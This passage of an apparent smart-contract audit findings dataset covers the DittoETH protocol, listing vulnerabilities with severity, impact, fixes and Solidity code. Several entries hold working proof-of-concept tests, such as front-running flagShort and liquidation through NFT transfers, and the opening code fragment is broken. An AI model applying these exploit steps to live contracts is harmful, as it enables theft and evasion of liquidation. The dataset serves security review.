<->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(""dao.protocol.setting.network""), ""network.reth.deposit.delay"")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, ""Not enough time has passed since deposit"");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.","Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying Reth bridge to obtain rETH only through the UniswapV3 pool, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.","Currently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. 
Specifically, protocol users staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH calling `BridgeReth::depositEth` would become irrecuperable, leading to a user bank run on DittoETH to not be perjudicated of this protocol externalization to all the users that have deposited.","```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked(""user.deposit.block"", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(""dao.protocol.setting.network""), ""network.reth.deposit.delay"")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, ""Not enough time has passed since deposit"");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n" +ETH cannot always be unstaked using Rocket Pool,low,"The protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, this will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. 
Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(""MAINNET_RPC_URL"");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(""Insufficient ETH balance for exchange"");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n","Check if Rocket Pool has enough ETH and if it doesn't, rEth can be exchanged for ETH on a DEX and sent to the user.",If Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.,"```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(""MAINNET_RPC_URL"");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n 
vm.expectRevert(""Insufficient ETH balance for exchange"");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n" +Users can avoid liquidation while being under the primary liquidation ratio if on the last short record,high,"The protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time 
frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is 
LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\n","Impose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n 
Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\n",This allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.,"```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n" +Incorrect require in setter,low,"There are 3 setters in `OwnerFacet.sol` which require statement doesn't match with the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100, which will revert with an incorrect error message, which is `""below 1.0""`. When 100 is 1.0, not below.\\n*Instances (3)`\\n```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, ""above max CR"");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].initialMargin, ""above initial margin"");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].primaryLiquidationCR, ""above primary liquidation"");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n\\nAs it is contrastable, in the below functions, 
this check is done correctly:\\n```\\n function _setForcedBidPriceBuffer(address asset, uint8 value) private {\\n require(value >= 100, ""below 1.0"");\\n require(value <= 200, ""above 2.0"");\\n s.asset[asset].forcedBidPriceBuffer = value;\\n }\\n\\n function _setMinimumCR(address asset, uint8 value) private {\\n require(value >= 100, ""below 1.0"");\\n require(value <= 200, ""above 2.0"");\\n s.asset[asset].minimumCR = value;\\n require(\\n LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n ""above secondary liquidation""\\n );\\n }\\n```\\n","Value to which is checked the `>` operator should be 101, not 100.","The incorrect value for the require statement could lead to a restriction of precion for this parameters, it wouldn't be possible to input a net value of 100.","```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, ""above max CR"");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].initialMargin, ""above initial margin"");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].primaryLiquidationCR, ""above primary liquidation"");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n" +Unhandled chainlink revert in case its multisigs block access to price feeds,low,"In some extreme cases, oracles can be taken offline or token prices can fall to zero. 
Therefore, a call to `latestRoundData` could potentially revert and none of the circuit breakers would fall back to querying any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit-breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n""While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. 
In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly"".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is imperative to note that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, In order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains command and can adeptly manage any errors in a secure and explicit manner.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFaucet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187","Encase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. 
In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.","If a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.","```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n"
+Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation,high,"A shorter can keep an unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner)\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different information, such as how much collateral is backing the short, and how much debt it owes (this ratio is called Collateral Ratio or CR). At any time, any user can flag someone else's SR as ""dangerous"", if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which checks through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled`. If the SR is valid, then its debt/collateral ratio is verified, and if it's below a specific threshold, flagged. But that also means that if a SR is considered invalid, it cannot be flagged. And it seems there is a way for the owner of a SR to cancel its SR while still holding the position.\\nThe owner of a SR can mint an NFT to represent it and make it transferable. 
This is done in 5 steps:\\n`TransferFrom` verifies usual stuff regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verifies that SR is not `flagged` nor `Cancelled`\\nSR is deleted (setting its status to Cancelled)\\na new SR is created with the same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has a SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls `flagShort` on SR_1, the tx is sent to the mempool\\nAlice is watching the mempool, and doesn't want her SR to be flagged:\\nShe front-runs Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nThe SR_1 is ""deleted"" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of the `onlyValidShortRecord`\\nAlice can do this trick again to keep her undercollateralized SR until it can become dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR<1.5), `liquidateSecondary` is also DoS'd as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol` :\\nFront-running flag\\n```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short 
flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address aliceThirdAddr = makeAddr(""AliceThirdAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //set cRatio below 1.1\\n setETH(700 ether);\\n \\n //Alice is still blocking all attempts to flag her short by transfering it to her secondary address by front-running Bob\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n //Alice front-run (again// rest of code) Bob and transfers the NFT to a third address she owns\\n vm.prank(aliceSecondAddr);\\n diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n 
//Bob's try again on the new address, but its attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n depositUsd(bob, shortRecord.ercDebt);\\n vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n }\\n```\\n",Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation,"Because of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.","```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, 
Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n" +Previous NFT owner can burn NFT from the new owner,high,"Short records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. 
Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in line of the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one being even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as a NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. 
This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint a NFT for the short via the `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates the outline issue 3 above:\\n",Consider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.,"The previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. 
This renders the short record unusable, and funds (collateral) associated with the short record are lost.","```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n" +Instant arbitrage opportunity through rETH and stETH price discrepancy,low,"User can choose to withdraw their zETH to be a rETH or stETH, while in reality most user will choose the best return (highest value between rETH and stETH), instant arbitrage will happen and this will trigger pool imbalance, draining one over the other.\\nIn DittoETH, they accept two special types of Ethereum tokens: rETH and stETH. These tokens are based on regular ETH but are designed to stay close in value to one regular Ether. However, in reality, they can have slightly different values. rETH, stETH.\\nIn practice, when user want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system doesn't really care which one you put in when a user first deposited their asset.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get a zeth, and then withdraw the more valuable rETH and stETH. 
A quick way to make some extra profit.\\nAs we can see on line 110-112, the rETH or stETH withdrawn depends on `ethAmount`, whose amount, per `_ethConversion`, is 'equal' between rETH and stETH\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = 
